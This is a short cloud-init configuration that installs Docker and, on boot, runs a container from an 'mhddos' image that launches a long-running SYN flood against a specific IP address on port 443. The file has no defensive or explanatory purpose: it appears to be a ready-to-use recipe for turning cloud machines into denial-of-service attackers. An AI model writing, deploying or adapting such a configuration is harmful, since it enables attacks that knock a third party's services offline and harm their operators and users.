#cloud-config

package_update: true
packages:
  - docker-ce
  - docker-ce-cli
  - containerd.io

apt:
  preserve_sources_list: true
  sources:
    docker-repo:
      source: "deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable"
      keyid: 8D81803C0EBFCD88
runcmd:
  - "docker run --name mhddos --rm -d djebos/mhddos:latest syn 185.114.138.220:443 100 999999"
